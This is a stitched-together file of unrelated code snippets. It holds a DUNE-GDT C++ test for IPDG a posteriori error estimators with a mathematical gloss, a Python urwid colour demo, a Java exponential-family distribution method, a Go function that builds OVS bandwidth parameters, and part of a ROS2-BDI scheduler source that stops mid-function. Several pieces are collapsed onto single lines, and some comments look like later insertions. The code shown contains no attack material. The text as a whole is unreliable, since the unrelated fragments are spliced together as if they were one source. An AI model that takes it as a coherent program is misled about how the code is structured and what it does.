        oswald_interpolation_operator.assemble(/*parallel=*/true);
        const auto h1_interpolation = oswald_interpolation_operator.apply(solution);
        self.current_data_["norm"][norm_id] =
            laplace_norm(current_space.grid_view(), /*weight=*/diffusion(), solution - h1_interpolation);
      } else if (norm_id == "eta_R") {
        norm_it = remaining_norms.erase(norm_it); // ... or here ...
        // compute estimate
        auto rt_space = make_raviart_thomas_space(current_space.grid_view(), current_space.max_polorder() - 1);
        auto reconstruction_op = make_laplace_ipdg_flux_reconstruction_operator<M>(current_space.grid_view(),
                                                                                   current_space,
                                                                                   rt_space,
                                                                                   symmetry_prefactor_,
                                                                                   inner_penalty_,
                                                                                   dirichlet_penalty_,
                                                                                   this->diffusion(),
                                                                                   this->weight_function(),
                                                                                   intersection_diameter_);
        auto flux_reconstruction = reconstruction_op.apply(solution);
        double eta_R_2 = 0.;
        std::mutex eta_R_2_mutex;
        auto walker = XT::Grid::make_walker(current_space.grid_view());
        walker.append(
            []() {},
            [&](const auto& element) {
              auto local_df = this->diffusion().local_function();
              local_df->bind(element);
              auto local_force = this->force().local_function();
              local_force->bind(element);
              auto local_flux = flux_reconstruction.local_function();
              local_flux->bind(element);
              auto flux_divergence = XT::Functions::divergence(*local_flux);
              flux_divergence.bind(element);
              // approximate minimum eigenvalue of the diffusion over the element ...
              double min_EV = std::numeric_limits<double>::max();
              // ... which we do by evaluating at some quadrature points
              for (auto&& quadrature_point : QuadratureRules<double, d>::rule(element.type(), local_df->order() + 3)) {
                auto diff = local_df->evaluate(quadrature_point.position());
                auto eigen_solver =
                    XT::LA::make_eigen_solver(diff,
                                              {{"type", XT::LA::EigenSolverOptions<decltype(diff)>::types().at(0)},
                                               {"assert_positive_eigenvalues", "1e-15"}});
                min_EV = std::min(min_EV, eigen_solver.min_eigenvalues(1).at(0));
              }
              DUNE_THROW_IF(!(min_EV > 0.),
                            Exceptions::integrand_error,
                            "The minimum eigenvalue of a positive definite matrix must be positive!"
                                << "\n\nmin_EV = " << min_EV);
              auto L2_norm_2 = LocalElementIntegralBilinearForm<E>(LocalProductIntegrand<E>(), /*over_integrate=*/3)
                                   .apply2(*local_force - flux_divergence, *local_force - flux_divergence)[0][0];
              const auto h = XT::Grid::diameter(element);
              const auto C_P = 1. / (M_PI * M_PI); // Poincare constant (known for simplices/cubes)
              std::lock_guard<std::mutex> lock(eta_R_2_mutex);
              eta_R_2 += (C_P * h * h * L2_norm_2) / min_EV;
            },
            []() {});
        walker.walk(/*parallel=*/true);
        self.current_data_["norm"][norm_id] = std::sqrt(eta_R_2);
      } else if (norm_id == "eta_DF") {
        norm_it = remaining_norms.erase(norm_it); // ... or here ...
// compute estimate auto rt_space = make_raviart_thomas_space(current_space.grid_view(), current_space.max_polorder() - 1); auto reconstruction_op = make_laplace_ipdg_flux_reconstruction_operator<M>(current_space.grid_view(), current_space, rt_space, symmetry_prefactor_, inner_penalty_, dirichlet_penalty_, this->diffusion(), this->weight_function(), intersection_diameter_); auto flux_reconstruction = reconstruction_op.apply(solution); double eta_DF_2 = 0.; std::mutex eta_DF_2_mutex; auto walker = XT::Grid::make_walker(current_space.grid_view()); walker.append( []() {}, [&](const auto& element) { auto local_df = this->diffusion().local_function(); local_df->bind(element); auto local_solution = solution.local_function(); local_solution->bind(element); auto local_reconstruction = flux_reconstruction.local_function(); local_reconstruction->bind(element); auto result = XT::Grid::element_integral<E>( element, [&](const auto& xx) { const auto diff = local_df->evaluate(xx); const auto diff_inv = XT::LA::invert_matrix(diff); const auto solution_grad = local_solution->jacobian(xx)[0]; const auto flux_rec = local_reconstruction->evaluate(xx); auto difference = diff * solution_grad + flux_rec; auto tmp_vec = difference; diff_inv.mv(difference, tmp_vec); return tmp_vec * difference; }, std::max(local_df->order() + std::max(local_solution->order() - 1, 0), local_reconstruction->order()) + /*over_integrate=*/3); std::lock_guard<std::mutex> lock(eta_DF_2_mutex); eta_DF_2 += result; }, []() {}); walker.walk(/*parallel=*/true); self.current_data_["norm"][norm_id] = std::sqrt(eta_DF_2); } else ++norm_it; // ... or finally here. } // norms // let the Base compute the rest return BaseType::compute(refinement_level, remaining_norms, remaining_estimates, remaining_quantities); } // ... compute(...) std::unique_ptr<S> make_space(const GP& current_grid) override { if (space_type_ == "fv") return std::make_unique<FiniteVolumeSpace<GV>>(current_grid.leaf_view()); else if (space_type_.size() >= 4 && space_type_.substr(0, 4) == "dg_p") { const auto order = XT::Common::from_string<int>(space_type_.substr(4)); return std::make_unique<DiscontinuousLagrangeSpace<GV>>(current_grid.leaf_view(), order); } else if (space_type_.size() >= 4 && space_type_.substr(0, 4) == "cg_p") { const auto order = XT::Common::from_string<int>(space_type_.substr(4)); return std::make_unique<ContinuousLagrangeSpace<GV>>(current_grid.leaf_view(), order); } else { DUNE_THROW(XT::Common::Exceptions::wrong_input_given, "space_type_ = " << space_type_); return nullptr; } } // ... make_space(...) std::unique_ptr<O> make_residual_operator(const S& space) override { // define lhs operator (has to be a pointer to allow the residual operator to manage the memory in the end) auto lhs_op = std::make_unique<MatrixOperator<M, GV>>(make_matrix_operator<M>( space, (space_type_.size() >= 2 && space_type_.substr(0, 2) == "cg") ? 
Stencil::element : Stencil::element_and_intersection)); // - volume term lhs_op->append(LocalElementIntegralBilinearForm<E>(LocalLaplaceIntegrand<E>(this->diffusion()))); // - inner faces lhs_op->append(LocalCouplingIntersectionIntegralBilinearForm<I>( LocalLaplaceIPDGIntegrands::InnerCoupling<I>(1., this->diffusion(), this->weight_function())), {}, XT::Grid::ApplyOn::InnerIntersectionsOnce<GV>()); lhs_op->append(LocalCouplingIntersectionIntegralBilinearForm<I>(LocalIPDGIntegrands::InnerPenalty<I>( inner_penalty_, this->weight_function(), intersection_diameter_)), {}, XT::Grid::ApplyOn::InnerIntersectionsOnce<GV>()); // - Dirichlet faces lhs_op->append( LocalIntersectionIntegralBilinearForm<I>( LocalLaplaceIPDGIntegrands::DirichletCoupling<I>(1., this->diffusion())), {}, XT::Grid::ApplyOn::CustomBoundaryIntersections<GV>(this->boundary_info(), new XT::Grid::DirichletBoundary())); lhs_op->append( LocalIntersectionIntegralBilinearForm<I>(LocalIPDGIntegrands::BoundaryPenalty<I>( dirichlet_penalty_, this->weight_function(), intersection_diameter_)), {}, XT::Grid::ApplyOn::CustomBoundaryIntersections<GV>(this->boundary_info(), new XT::Grid::DirichletBoundary())); // define rhs functional auto rhs_func = make_vector_functional<V>(space); rhs_func.append(LocalElementIntegralFunctional<E>(LocalProductIntegrand<E>().with_ansatz(this->force()))); // ... add Dirichlet here // (if we add something here, the oswald interpolation in compute() needs to be adapted accordingly!) // ... add Neumann here // assemble everything in one grid walk lhs_op->append(rhs_func); lhs_op->assemble(DXTC_TEST_CONFIG_GET("setup.use_tbb", true)); // build residual operator auto residual_op = std::make_unique<ConstLincombOperator<M, GV>>(space, space); residual_op->add(lhs_op.release(), 1.); residual_op->add(new ConstantOperator<M, GV>(space, space, new V(std::move(rhs_func.vector()))), -1); return residual_op; } // ... make_residual_operator(...) std::string space_type_; const double symmetry_prefactor_; const double inner_penalty_; const double dirichlet_penalty_; const std::function<double(const I&)> intersection_diameter_; }; // class StationaryDiffusionIpdgEocStudy } // namespace Test } // namespace GDT } // namespace Dune #endif // DUNE_GDT_TEST_STATIONARY_EOCSTUDIES_DIFFUSION_IPDG_HH
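For orientation (our gloss, not part of the original header), the three contributions assembled in compute() correspond to the standard quantities of flux-reconstruction-based a posteriori error analysis, with $t_h$ the Raviart-Thomas flux reconstruction, $\mathcal{I}_{\mathrm{Os}}$ the Oswald interpolation onto the conforming subspace, $C_P = 1/\pi^2$ the Poincare constant used for simplices/cubes, and $\lambda_{\min}(A|_K)$ the minimum eigenvalue of the diffusion $A$ on element $K$:

$$\eta_{\mathrm{NC}}^2 = \big\| A^{1/2} \nabla (u_h - \mathcal{I}_{\mathrm{Os}} u_h) \big\|_{L^2}^2, \qquad
\eta_{\mathrm{R}}^2 = \sum_K \frac{C_P\, h_K^2}{\lambda_{\min}(A|_K)} \big\| f - \nabla \cdot t_h \big\|_{L^2(K)}^2, \qquad
\eta_{\mathrm{DF}}^2 = \sum_K \int_K (A \nabla u_h + t_h) \cdot A^{-1} (A \nabla u_h + t_h) \, dx.$$

These match, respectively, the weighted laplace_norm of the Oswald-interpolation defect, the eta_R_2 accumulation, and the eta_DF_2 accumulation in the walker lambdas above; the exact weighting conventions should be read off the code rather than this sketch.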
#!/usr/bin/env python

import urwid

# ===========================================================================

def exit_on_q(key):
    if key in ('q', 'Q'):
        raise urwid.ExitMainLoop()

# ===========================================================================

colour_groups = [
    # all colours
    ('black ', 'white ', 'brown ', 'yellow '),
    ('dark red ', 'light red ', 'dark green ', 'light green',),
    ('dark blue ', 'light blue ', 'dark cyan ', 'light cyan ',),
    ('dark magenta ', 'light magenta ', 'dark gray ', 'light gray ',),

    # colours from Pygments
    ('dark cyan ', 'brown ', 'dark green ', 'dark magenta'),
    ('dark blue ', ),
    ('dark blue', ),
]

highlights = [
    'dark gray',
    'light gray',
]

palette = []
mapset = [ {} for h in highlights ]
for group in colour_groups:
    for colour in group:
        cname = colour.rstrip()
        palette.append( (cname, cname, '') )

        for index, highlight in enumerate(highlights):
            hname = f'{cname}_{highlight}_hl'
            palette.append( ( hname, cname, highlight) )
            mapset[index][cname] = hname

# ===========================================================================
# create a Text widget with each colour in the palette

contents = []
for group in colour_groups:
    text = [(cname.rstrip(), cname) for cname in group]
    contents.append( urwid.Text(text) )

for index, highlight in enumerate(highlights):
    contents.append( urwid.Text(' ') )
    for group in colour_groups:
        text = [(cname.rstrip(), cname) for cname in group]
        contents.append( urwid.AttrMap( urwid.Text(text), mapset[index] ) )

walker = urwid.SimpleListWalker(contents)
box = urwid.ListBox(walker)

loop = urwid.MainLoop(box, palette, unhandled_input=exit_on_q)
loop.run()
/** * Creates a new exponential family conditional distribution given the input list of parents. * @param parents the list of parents. * @param <E> the type of elements. * @return an exponential family conditional distribution. */ public <E extends EF_ConditionalDistribution> E newEFConditionalDistribution(List<Variable> parents){ if (!this.areParentsCompatible(parents)) throw new IllegalArgumentException("Parents are not compatible"); if (parents.isEmpty()) return (E)new EF_SparseMultinomial(this.variable); else { List<EF_SparseMultinomial> base_ef_dists = new ArrayList<>(); int size = MultinomialIndex.getNumberOfPossibleAssignments(parents); for (int i = 0; i < size; i++) { base_ef_dists.add(this.variable.getDistributionType().newEFUnivariateDistribution()); } return (E) new EF_BaseDistribution_MultinomialParents<EF_SparseMultinomial>(parents, base_ef_dists); } }
/* Build a map suitable for use as parms for a bandwidth request to the agent manager. The agent bandwidth flow-mod generator takes a more generic set of parameters and the match/action information is "compressed". OVS doesn't accept DSCP values, but shifted values (e.g. 46 == 184), so we shift the DSCP value given to be what OVS might want as a parameter. */ func ( fq *Fq_req ) To_bw_map( ) ( fmap map[string]string ) { fmap = make( map[string]string ) if fq == nil { return } if fq.Match.Smac != nil { fmap["smac"] = *fq.Match.Smac } else { fmap["smac"] = "" } if fq.Match.Dmac != nil { fmap["dmac"] = *fq.Match.Dmac } else { fmap["dmac"] = "" } if fq.Extip != nil { fmap["extip"] = *fq.Extip } else { fmap["extip"] = "" } if fq.Exttyp != nil { fmap["extdir"] = *fq.Exttyp } else { fmap["extdir"] = "" } if fq.Match.Vlan_id != nil { fmap["vlan_match"] = *fq.Match.Vlan_id } else { fmap["vlan_match"] = "" } if fq.Action.Vlan_id != nil { fmap["vlan_action"] = *fq.Action.Vlan_id } else { fmap["vlan_action"] = "" } fmap["queue"] = fmt.Sprintf( "%d", fq.Espq.Queuenum ) fmap["dscp"] = fmt.Sprintf( "%d", fq.Dscp << 2 ) fmap["ipv6"] = fmt.Sprintf( "%v", fq.Ipv6 ) fmap["timeout"] = fmt.Sprintf( "%d", fq.Expiry - time.Now().Unix() ) fmap["oneswitch"] = fmt.Sprintf( "%v", fq.Single_switch ) fmap["koe"] = fmt.Sprintf( "%v", fq.Dscp_koe ) if fq.Tptype != nil && *fq.Tptype != "none" && *fq.Tptype != "" { if fq.Match.Tpsport != nil { fmap["sproto"] = fmt.Sprintf( "%s:%s", *fq.Tptype, *fq.Match.Tpsport ) } if fq.Match.Tpdport != nil { fmap["dproto"] = fmt.Sprintf( "%s:%s", *fq.Tptype, *fq.Match.Tpdport ) } } if fq_sheep.Would_baa( 3 ) { for k, v := range fmap { fq_sheep.Baa( 3, "fq_req to action id=%s %s = %s", fq.Id, k, v ) } } return }
<reponame>devis12/ROS2-BDI // header file for Scheduler node #include "ros2_bdi_core/scheduler.hpp" // Inner logic + ROS PARAMS & FIXED GLOBAL VALUES for ROS2 core nodes #include "ros2_bdi_core/params/core_common_params.hpp" // Inner logic + ROS2 PARAMS & FIXED GLOBAL VALUES for Scheduler node #include "ros2_bdi_core/params/scheduler_params.hpp" // Inner logic + ROS2 PARAMS & FIXED GLOBAL VALUES for Belief Manager node (for belief set topic) #include "ros2_bdi_core/params/belief_manager_params.hpp" // Inner logic + ROS2 PARAMS & FIXED GLOBAL VALUES for Belief Manager node (for plan exec srv & topic) #include "ros2_bdi_core/params/plan_director_params.hpp" // Inner logic + ROS2 PARAMS & FIXED GLOBAL VALUES for PlanSys2 Monitor node (for psys2 state topic) #include "ros2_bdi_core/params/plansys2_monitor_params.hpp" #include <yaml-cpp/exceptions.h> #include "ros2_bdi_utils/BDIFilter.hpp" #include "ros2_bdi_utils/BDIPDDLConverter.hpp" #include "ros2_bdi_utils/BDIYAMLParser.hpp" #include "ros2_bdi_utils/ManagedCondition.hpp" #include "ros2_bdi_utils/ManagedConditionsConjunction.hpp" #include "ros2_bdi_utils/ManagedConditionsDNF.hpp" using std::string; using std::vector; using std::set; using std::map; using std::mutex; using std::shared_ptr; using std::chrono::milliseconds; using std::bind; using std::placeholders::_1; using std::optional; using plansys2::DomainExpertClient; using plansys2::ProblemExpertClient; using plansys2::PlannerClient; using plansys2::Instance; using plansys2::Predicate; using plansys2::Goal; using plansys2_msgs::msg::Plan; using plansys2_msgs::msg::PlanItem; using ros2_bdi_interfaces::msg::Belief; using ros2_bdi_interfaces::msg::Desire; using ros2_bdi_interfaces::msg::BeliefSet; using ros2_bdi_interfaces::msg::DesireSet; using ros2_bdi_interfaces::msg::Condition; using ros2_bdi_interfaces::msg::ConditionsConjunction; using ros2_bdi_interfaces::msg::ConditionsDNF; using ros2_bdi_interfaces::msg::PlanSys2State; using ros2_bdi_interfaces::msg::BDIActionExecutionInfo; using ros2_bdi_interfaces::msg::BDIPlanExecutionInfo; using ros2_bdi_interfaces::srv::BDIPlanExecution; using BDIManaged::ManagedBelief; using BDIManaged::ManagedDesire; using BDIManaged::ManagedPlan; Scheduler::Scheduler() : rclcpp::Node(SCHEDULER_NODE_NAME), state_(STARTING) { psys2_comm_errors_ = 0; this->declare_parameter(PARAM_AGENT_ID, "agent0"); this->declare_parameter(PARAM_DEBUG, true); this->declare_parameter(PARAM_MAX_TRIES_COMP_PLAN, 8); this->declare_parameter(PARAM_MAX_TRIES_EXEC_PLAN, 8); this->declare_parameter(PARAM_RESCHEDULE_POLICY, VAL_RESCHEDULE_POLICY_NO_IF_EXEC); this->declare_parameter(PARAM_AUTOSUBMIT_PREC, false); this->declare_parameter(PARAM_AUTOSUBMIT_CONTEXT, false); } /* Init to call at the start, after construction method, to get the node actually started initialing planner client instance, retrieving agent_id_ (thus namespace) defining work timer, belief set subscriber callback, desire set publisher, add/del desire subscribers callback */ void Scheduler::init() { //agent's namespace agent_id_ = this->get_parameter(PARAM_AGENT_ID).as_string(); // initializing domain expert domain_expert_ = std::make_shared<plansys2::DomainExpertClient>(); // initializing problem expert problem_expert_ = std::make_shared<plansys2::ProblemExpertClient>(); // initializing planner client planner_client_ = std::make_shared<plansys2::PlannerClient>(); // Declare empty desire set desire_set_ = set<ManagedDesire>(); // wait for it to be init init_dset_ = false; //Desire set publisher 
    desire_set_publisher_ = this->create_publisher<DesireSet>(DESIRE_SET_TOPIC, 10);

    rclcpp::QoS qos_keep_all = rclcpp::QoS(10);
    qos_keep_all.keep_all();

    //Check for plansys2 active state flags init to false
    psys2_planner_active_ = false;
    psys2_domain_expert_active_ = false;
    psys2_problem_expert_active_ = false;
    //plansys2 nodes status subscriber (receive notification from plansys2_monitor node)
    plansys2_status_subscriber_ = this->create_subscription<PlanSys2State>(
                PSYS2_STATE_TOPIC, qos_keep_all,
                bind(&Scheduler::callbackPsys2State, this, _1));

    //Desire to be added notification
    add_desire_subscriber_ = this->create_subscription<Desire>(
                ADD_DESIRE_TOPIC, qos_keep_all,
                bind(&Scheduler::addDesireTopicCallBack, this, _1));

    //Desire to be removed notification
    del_desire_subscriber_ = this->create_subscription<Desire>(
                DEL_DESIRE_TOPIC, qos_keep_all,
                bind(&Scheduler::delDesireTopicCallBack, this, _1));

    //belief_set_subscriber_
    belief_set_subscriber_ = this->create_subscription<BeliefSet>(
                BELIEF_SET_TOPIC, qos_keep_all,
                bind(&Scheduler::updatedBeliefSet, this, _1));

    plan_exec_srv_client_ = std::make_shared<TriggerPlanClient>(PLAN_EXECUTION_SRV + string("_s_caller"));

    plan_exec_info_subscriber_ = this->create_subscription<BDIPlanExecutionInfo>(
        PLAN_EXECUTION_TOPIC, 10,
        bind(&Scheduler::updatePlanExecution, this, _1)
    );

    //loop to be called regularly to perform work (publish desire_set_, sync with plansys2 problem_expert node, ...)
    do_work_timer_ = this->create_wall_timer(
        milliseconds(500),
        bind(&Scheduler::step, this));

    RCLCPP_INFO(this->get_logger(), "Scheduler node initialized");
}

/*
    Main loop of work called regularly through a wall timer
*/
void Scheduler::step()
{
    // all psys2 up -> no psys2 comm. errors
    if(psys2_planner_active_ && psys2_domain_expert_active_ && psys2_problem_expert_active_ )
        psys2_comm_errors_ = 0;

    //if psys2 appears crashed, crash too
    if(psys2_comm_errors_ > MAX_COMM_ERRORS)
        rclcpp::shutdown();

    switch (state_) {
        case STARTING:
        {
            if(psys2_planner_active_ && psys2_domain_expert_active_ && psys2_problem_expert_active_){
                psys2_comm_errors_ = 0;
                if(!init_dset_)//hasn't been tried to init desire set yet
                {
                    tryInitDesireSet();
                    init_dset_ = true;
                }
                setState(SCHEDULING);
            }else{
                if(!psys2_planner_active_)
                    RCLCPP_ERROR(this->get_logger(), "PlanSys2 Planner still not active");
                if(!psys2_domain_expert_active_)
                    RCLCPP_ERROR(this->get_logger(), "PlanSys2 Domain Expert still not active");
                if(!psys2_problem_expert_active_)
                    RCLCPP_ERROR(this->get_logger(), "PlanSys2 Problem Expert still not active");
                psys2_comm_errors_++;
            }

            break;
        }

        case SCHEDULING:
        {
            publishDesireSet();

            string reschedulePolicy = this->get_parameter(PARAM_RESCHEDULE_POLICY).as_string();
            bool noPlan = noPlanSelected();
            /*
                Either the reschedule policy is "no if a plan is executing" AND there is no plan currently in exec,
                or the reschedule policy allows rescheduling while a plan is in exec
            */
            if(reschedulePolicy == VAL_RESCHEDULE_POLICY_NO_IF_EXEC && noPlan ||
                reschedulePolicy != VAL_RESCHEDULE_POLICY_NO_IF_EXEC)
            {
                if(this->get_parameter(PARAM_DEBUG).as_bool())
                    RCLCPP_INFO(this->get_logger(), "Reschedule to select new plan to be executed");
                reschedule();
            }else{
                //already selected a plan currently in exec
            }

            break;//the original code fell through into PAUSE here; the explicit break avoids the accidental fallthrough without changing behaviour
        }

        case PAUSE:
        {
            //RCLCPP_INFO(this->get_logger(), "Not the moment to ask for new cleaning tasks yet");
            break;
        }
        default:
            break;
    }
}

/*
    Publish the current desire set of the agent in agent_id_/desire_set topic
*/
void Scheduler::publishDesireSet()
{
    DesireSet dset_msg = BDIFilter::extractDesireSetMsg(desire_set_);
    dset_msg.agent_id = agent_id_;
    desire_set_publisher_->publish(dset_msg);
}

/*
    Received notification about PlanSys2 nodes state by plansys2 monitor node
*/
void Scheduler::callbackPsys2State(const PlanSys2State::SharedPtr msg)
{
    psys2_problem_expert_active_ = msg->problem_expert_active;
    psys2_domain_expert_active_ = msg->domain_expert_active;
    psys2_planner_active_ = msg->planner_active;
}

/*
    Expect to find yaml file to init the desire set in "/tmp/{agent_id}/init_dset.yaml"
*/
void Scheduler::tryInitDesireSet()
{
    string init_dset_filepath = "/tmp/"+this->get_parameter(PARAM_AGENT_ID).as_string() + "/" + INIT_DESIRE_SET_FILENAME;
    try{
        vector<ManagedDesire> init_mgdesires = BDIYAMLParser::extractMGDesires(init_dset_filepath);
        for(ManagedDesire initMGDesire : init_mgdesires)
            if(initMGDesire.getValue().size() > 0)
                addDesire(initMGDesire);
        if(this->get_parameter(PARAM_DEBUG).as_bool())
            RCLCPP_INFO(this->get_logger(), "Desire set initialization performed through " + init_dset_filepath);
    }catch(const YAML::BadFile& bfile){
        RCLCPP_ERROR(this->get_logger(), "Bad File: Desire set initialization failed because init. file " + init_dset_filepath + " hasn't been found");
    }catch(const YAML::ParserException& bpars){
        RCLCPP_ERROR(this->get_logger(), "YAML Parser Exception: Desire set initialization failed because init. file " + init_dset_filepath + " doesn't present a valid YAML format");
    }catch(const YAML::BadConversion& bconvfile){
        RCLCPP_ERROR(this->get_logger(), "Bad Conversion: Desire set initialization failed because init. file " + init_dset_filepath + " doesn't present a valid desire array");
    }catch(const YAML::InvalidNode& invalid_node){
        RCLCPP_ERROR(this->get_logger(), "Invalid Node: Desire set initialization failed because init. file " + init_dset_filepath + " doesn't present a valid desire array");
    }
}

/*
    returns ACCEPTED iff the managed belief can be put as part of a desire's value w.r.t. its syntax
*/
TargetBeliefAcceptance Scheduler::targetBeliefAcceptanceCheck(const ManagedBelief& mb)
{
    if(mb.pddlType() != Belief().PREDICATE_TYPE)//not predicate -> not accepted
        return UNKNOWN_PREDICATE;

    optional<Predicate> optPredDef = domain_expert_->getPredicate(mb.getName());
    if(!optPredDef.has_value())//incorrect predicate name
        return UNKNOWN_PREDICATE;

    Predicate predDef = optPredDef.value();
    if(predDef.parameters.size() != mb.getParams().size())
        return SYNTAX_ERROR;

    vector<string> params = mb.getParams();
    for(int i=0; i<params.size(); i++)
    {
        string instanceName = params[i];
        optional<Instance> opt_ins = problem_expert_->getInstance(instanceName);
        if(!opt_ins.has_value())//found an invalid instance in one of the goal predicates
            return UNKNOWN_INSTANCES;
        else if(opt_ins.value().type != predDef.parameters[i].type)//instance types not matching definition
            return UNKNOWN_INSTANCES;
    }

    return ACCEPTED;
}

/*
    Check with the domain_expert and problem_expert to understand if this is a valid goal
    (i.e. valid predicates and valid instances defined within them)

    returns ACCEPTED iff the managed desire can be considered syntactically correct
    (no syntactically incorrect beliefs)
*/
TargetBeliefAcceptance Scheduler::desireAcceptanceCheck(const ManagedDesire& md)
{
    for(ManagedBelief mb : md.getValue())
    {
        auto acceptance = targetBeliefAcceptanceCheck(mb);
        if(acceptance != ACCEPTED)
            return acceptance;
    }
    return ACCEPTED;
}

/*
    Compute plan from managed desire, setting its belief array representing the desirable state to reach
    as the goal of the PDDL problem
*/
optional<Plan> Scheduler::computePlan(const ManagedDesire& md)
{
    //set desire as goal of the pddl_problem
    if(!problem_expert_->setGoal(Goal{BDIPDDLConverter::desireToGoal(md.toDesire())})){
        psys2_comm_errors_++;//plansys2 comm. errors
        return std::nullopt;
    }

    string pddl_domain = domain_expert_->getDomain();//get domain string
    string pddl_problem = problem_expert_->getProblem();//get problem string
    return planner_client_->getPlan(pddl_domain, pddl_problem);//compute plan (n.b. infeasible goal -> plan not computed)
}

/*
    Check if there is a current valid plan selected
*/
bool Scheduler::noPlanSelected()
{
    return current_plan_.getDesire().getPriority() == 0.0f && current_plan_.getBody().size() == 0;
}

/*
    Select plan execution based on precondition, deadline
*/
void Scheduler::reschedule()
{
    string reschedulePolicy = this->get_parameter(PARAM_RESCHEDULE_POLICY).as_string();
    bool noPlan = noPlanSelected();
    if(reschedulePolicy == VAL_RESCHEDULE_POLICY_NO_IF_EXEC && !noPlan)//rescheduling not admitted
        return;

    //rescheduling possible, but a plan is currently in exec (substitute just for a plan with higher priority)
    bool planinExec = reschedulePolicy != VAL_RESCHEDULE_POLICY_NO_IF_EXEC && !noPlan;

    // priority of selected plan
    float highestPriority = -1.0f;
    // deadline of selected plan
    float selectedDeadline = -1.0f;// init to negative value

    ManagedPlan selectedPlan;

    vector<ManagedDesire> discarded_desires;

    mtx_iter_dset_.lock();//to sync between iteration in checkForSatisfiedDesires() && reschedule()

    set<ManagedDesire> skip_desires;

    for(ManagedDesire md : desire_set_)
    {
        if(skip_desires.count(md) == 1)
            continue;

        //desire currently being fulfilled
        if(current_plan_.getDesire() == md)
            continue;

        //plan in exec has higher priority than this one, skip this desire
        if(planinExec && current_plan_.getDesire().getPriority() > md.getPriority())
            continue;

        bool computedPlan = false;//flag to mark plan for desire as computable
        bool invalidDesire = false;//flag to mark invalid desire

        // select just desires with satisfying precondition and
        // with higher or equal priority with respect to the one currently selected
        bool explicitPreconditionSatisfied = md.getPrecondition().isSatisfied(belief_set_);
        if(explicitPreconditionSatisfied && md.getPriority() >= highestPriority){
            optional<Plan> opt_p = computePlan(md);
            if(opt_p.has_value())
            {
                computedPlan = true;

                ManagedPlan mp = ManagedPlan{md, opt_p.value().items, md.getPrecondition(), md.getContext()};
                // does computed deadline for this plan respect desire deadline?
                if(mp.getPlanDeadline() <= md.getDeadline())
                {
                    // pick it as selected plan iff: no plan selected yet || desire has higher priority than the one selected
                    // || equal priority, but smaller deadline
                    if(selectedDeadline < 0 || md.getPriority() > highestPriority || mp.getPlanDeadline() < selectedDeadline)
                    {
                        selectedDeadline = mp.getPlanDeadline();
                        highestPriority = md.getPriority();
                        selectedPlan = mp;

                    }else if(md.getPriority() <= highestPriority && this->get_parameter(PARAM_DEBUG).as_bool()){
                        RCLCPP_INFO(this->get_logger(), "There is a plan to fulfill desire \"" + md.getName() + "\", but "+
                            "it is not the desire (among those for which a plan can be selected) with the highest priority right now");

                    }else if(mp.getPlanDeadline() >= selectedDeadline && this->get_parameter(PARAM_DEBUG).as_bool()){
                        RCLCPP_INFO(this->get_logger(), "There is a plan to fulfill desire \"" + md.getName() + "\", but "+
                            "it is not the desire (among those for which a plan can be selected) with the highest priority and the earliest deadline right now");
                    }

                }else if(this->get_parameter(PARAM_DEBUG).as_bool())
                    RCLCPP_INFO(this->get_logger(), "There is a plan to fulfill desire \"" + md.getName() + "\", but it does not respect the deadline constraint");
            }
            else if(desireAcceptanceCheck(md) != ACCEPTED) //check if the problem is the goal not being valid
            {
                invalidDesire = true;
            }
            else
            {
                if(!this->get_parameter(PARAM_DEBUG).as_bool())
                    RCLCPP_INFO(this->get_logger(), "Desire \"" + md.getName() + "\" presents a valid goal, but the planner cannot compute any plan for it at the moment");
            }
        }
        else if(!explicitPreconditionSatisfied && this->get_parameter(PARAM_AUTOSUBMIT_PREC).as_bool())
        {
            int pushed = 0;
            if(desireAcceptanceCheck(md) == ACCEPTED)
            {
                // explicit preconditions are not satisfied... see if it's feasible to compute a plan to reach them
                // (just if not already done... that's why you look into the invalid map)
                // if it is the case, submit desire to itself with higher priority than the one just considered
                string fulfillPreconditionDesireName = md.getName() + "_fulfill_precondition";

                //put slightly lower priority because these would be desires to satisfy the precondition
                vector<ManagedDesire> fulfillPreconditionDesires = BDIFilter::conditionsToMGDesire(md.getPrecondition(),
                    fulfillPreconditionDesireName,
                    std::min(md.getPriority()-0.01f, 1.0f), md.getDeadline());

                for(ManagedDesire fulfillPreconditionD : fulfillPreconditionDesires)
                {
                    auto precAcceptanceCheck = desireAcceptanceCheck(fulfillPreconditionD);
                    if(desire_set_.count(fulfillPreconditionD) == 0 && precAcceptanceCheck == ACCEPTED)//fulfill precondition not inserted yet
                    {
                        if(this->get_parameter(PARAM_DEBUG).as_bool())
                            RCLCPP_INFO(this->get_logger(), "Preconditions are not satisfied for desire \"" + md.getName() + "\" but could be satisfied: " +
                                "auto-submission of desire \"" + fulfillPreconditionD.getName() + "\"");
                        fulfillPreconditionD.setParent(md);//set md as its parent desire
                        if(addDesire(fulfillPreconditionD, md, "_preconditions"))
                            pushed++;
                    }
                }
            }
            if(pushed == 0)
                invalidDesire = true;
        }

        if(invalidDesire || (!computedPlan && explicitPreconditionSatisfied))
        {
            int invCounter = ++computed_plan_desire_map_[md.getName()]; //increment invalid counter for this desire
            int maxTries = this->get_parameter(PARAM_MAX_TRIES_COMP_PLAN).as_int();

            TargetBeliefAcceptance desAcceptance = desireAcceptanceCheck(md);
            string desireProblem = (desAcceptance != ACCEPTED)? "invalid goal" : "plan not computable";
            string desireOperation = (invCounter < maxTries && (desAcceptance == ACCEPTED || desAcceptance == UNKNOWN_INSTANCES))?
                "desire will be rescheduled later" : "desire will be deleted from desire set";

            if(this->get_parameter(PARAM_DEBUG).as_bool())
                RCLCPP_INFO(this->get_logger(), "Desire \"" + md.getName() + "\" (or its preconditions): " + desireProblem + " ; " + desireOperation +
                    " (invalid counter = %d/%d). " + std::to_string(desAcceptance), invCounter, maxTries);

            if(invCounter >= maxTries || (desAcceptance != ACCEPTED && desAcceptance != UNKNOWN_INSTANCES))//desire now has to be discarded
            {
                discarded_desires.push_back(md);// plan to delete desire from desire_set (not doing it here because we're cycling on the desire set)

                // check if this desire is trying to satisfy the precondition and/or context condition of another desire
                // and there are no other desires within the same group -> delete that desire too
                int groupCounter = 0;
                for(ManagedDesire mdCheck : desire_set_)
                    if(mdCheck.getDesireGroup() == md.getDesireGroup())
                        groupCounter ++;
                if(md.hasParent() && groupCounter == 0)//invalid desire has remained the last one in the group
                {
                    discarded_desires.push_back(md.getParent());//parent cannot be satisfied either
                    skip_desires.insert(md.getParent());//avoid evaluating it later
                }
            }
        }
    }

    mtx_iter_dset_.unlock();//to sync between iteration in checkForSatisfiedDesires() && reschedule()

    //remove discarded desires
    for(ManagedDesire md : discarded_desires)
        delDesire(md);

    if(selectedPlan.getBody().size() > 0)
